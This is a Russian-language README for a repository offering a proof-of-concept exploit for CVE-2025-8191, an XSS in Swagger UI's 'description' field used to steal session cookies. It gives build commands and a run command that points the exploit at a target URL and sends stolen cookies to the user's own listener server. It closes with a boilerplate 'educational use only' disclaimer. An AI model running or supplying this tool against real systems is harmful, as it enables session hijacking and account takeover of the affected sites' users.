
Репозиторий, содержащий эксплойт PoC для CVE‑2025‑8191 в Swagger UI, использующий XSS-инъекцию для извлечения сессионных cookie.
Этот репозиторий содержит Proof‑of‑Concept (PoC) эксплойт для CVE‑2025‑8191 — уязвимости, обнаруженной в Swagger UI.
Уязвимость позволяет внедрение межсайтового скриптинга (XSS) в поле «description», что приводит к удаленному выполнению скриптов в версиях Swagger UI ≤ 1.0.3.
gcc exploit.c argparse.c -o exploit -lcurl
./exploit -u http://target.com -s http://yourserver.com -v
Замените http://target.com на URL целевого Swagger UI, а http://yourserver.com — на ваш HTTP-слушатель для эксфильтрации.
Этот код предназначен только для образовательных целей и исследований в области безопасности. НЕ ИСПОЛЬЗУЙТЕ его на системах, на которые у вас нет явного разрешения. Автор не несет ответственности за любое неправомерное использование.
Лицензия MIT